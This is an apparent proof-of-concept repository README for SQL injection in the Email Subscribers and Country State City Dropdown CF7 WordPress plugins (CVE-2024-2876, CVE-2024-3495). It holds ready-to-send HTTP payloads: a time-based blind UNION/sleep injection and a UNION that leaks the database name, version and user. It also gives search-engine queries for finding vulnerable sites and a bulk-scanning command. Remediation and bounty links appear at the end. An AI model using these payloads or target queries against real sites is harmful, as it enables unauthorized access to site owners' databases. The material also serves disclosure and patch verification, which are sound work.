POC details: 02b832679901c71eb1a7f9ad3ad62955a2f9df27

Source
Related vulnerability
Title: WordPress Plugin email-subscribers SQL injection vulnerability (CVE-2024-2876)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it lets users host a personal blog on a server running PHP and MySQL. A WordPress plugin is an application add-on. WordPress Plugin email-subscribers 5.7.14 and earlier contain a SQL injection vulnerability caused by insufficient escaping of user-supplied parameters in the run function of IG_ES_Subscribers_Query; an attacker exploiting it can append additional SQL queries
Description
WP-SQL-Injection CVE-2024-2876 and CVE-2024-3495
Introduction
---

# WP-SQL Injection Vulnerabilities: CVE-2024-2876 and CVE-2024-3495

This repository documents two SQL injection vulnerabilities affecting WordPress plugins. Below are descriptions, queries, proof of concept (PoC) scripts, and remediation steps for each vulnerability.

## Vulnerability Descriptions

### Description - CVE-2024-2876
The **Email Subscribers by Icegram Express** plugin for WordPress (versions up to and including 5.7.14) is vulnerable to SQL injection in the `run` function of the `IG_ES_Subscribers_Query` class. A user-supplied filter field is concatenated into the query without escaping or `$wpdb->prepare()`, so an unauthenticated attacker can append their own SQL (a UNION with `sleep()` in the PoC below) and extract sensitive data from the database.

### Description - CVE-2024-3495
The **Country State City Dropdown CF7** plugin for WordPress (versions up to and including 2.7.2) is vulnerable to SQL injection via the `cnt` and `sid` parameters of its AJAX handlers. The values are neither escaped nor bound through a prepared statement, so an unauthenticated attacker can append arbitrary SQL to the query and read sensitive database information.

## Scanner Script
The bundled `CVE-2024-2876.py` tests a target for both CVE-2024-2876 and CVE-2024-3495. Pass a single site with `-u`, or a file with one URL per line with `-f`:

```bash
python3 CVE-2024-2876.py -u http://website.com
python3 CVE-2024-2876.py -f urls.txt
```

## Querying for Affected Sites

### Query for CVE-2024-2876
- **FOFA**: `body="/wp-content/plugins/email-subscribers/"`
- **publicwww**: `"/wp-content/plugins/email-subscribers/"`

### Query for CVE-2024-3495
- **FOFA**: `body="/wp-content/plugins/country-state-city-auto-dropdown" && header="HTTP/1.1 200 OK"`
- **Publicwww**: `"/wp-content/plugins/country-state-city-auto-dropdown"`
- **Shodan**: `http.title:"admin-ajax.php"` (matches any WordPress site, not this plugin specifically; verify the plugin path before testing)

## Proof of Concept (PoC) Code Blocks

### PoC - CVE-2024-2876
Example exploit using the SQL injection vulnerability via the `admin-post.php` endpoint. The payload is a time-based blind injection: the `field` value closes the plugin's open parentheses and appends `union(select(sleep(4)))`, so a vulnerable host answers roughly 4 seconds later than an unmodified request. Use a client timeout of at least 20 seconds (the original template annotates the request with `@timeout: 20s`) and compare against a baseline request so a slow server is not mistaken for a vulnerable one.

```http
POST /wp-admin/admin-post.php HTTP/1.1
Host: <Host>
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```

### PoC - CVE-2024-3495
Example exploit using `admin-ajax.php`. Replace `{{nonce}}` with the `nonce_ajax` value the plugin emits on a page that renders its dropdown (the nonce is readable without authentication). The injected `cnt` value is a UNION that concatenates `database()`, `version()` and `user()` with hex-encoded markers: `0x64617461626173653a` is `database:`, `0x7c76657273696f6e3a` is `|version:` and `0x7c757365723a` is `|user:`, so the leaked values appear in the returned state list as `database:<db>|version:<ver>|user:<user>`. Let the client (Burp does this automatically) set `Content-Length` to the final body length.

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```

## Remediation Steps

### Remediation for CVE-2024-2876
- **Upgrade**: Update the plugin to version 5.7.15, which contains the fix, or later (5.7.19 was current when this README was written).
- **Automatic Updates**: Patchstack users can enable automatic updates for vulnerable plugins.
- **WAF/WAAP**: A Web Application Firewall (WAF) or Web Application and API Protection (WAAP) solution can block the known payload patterns (UNION/`sleep()` in `advanced_filter` fields), but it is a stopgap rather than a substitute for the upgrade.

### Remediation for CVE-2024-3495
- **Upgrade**: Update Country State City Dropdown CF7 to version 2.7.3 or later, where `cnt` and `sid` are handled through prepared queries.

## Bounty Information - CVE-2024-2876
For more information on the CVE and bounty details, visit:
- [Wordfence Blog on CVE-2024-2876](https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/)

--- 
File snapshot

```
/data/pocs/02b832679901c71eb1a7f9ad3ad62955a2f9df27
├── [5.1K] CVE-2024-2876.py
├── [ 845] CVE-2024-2876.yaml
├── [ 944] CVE-2024-3495.yaml
└── [3.5K] README.md

0 directories, 4 files
```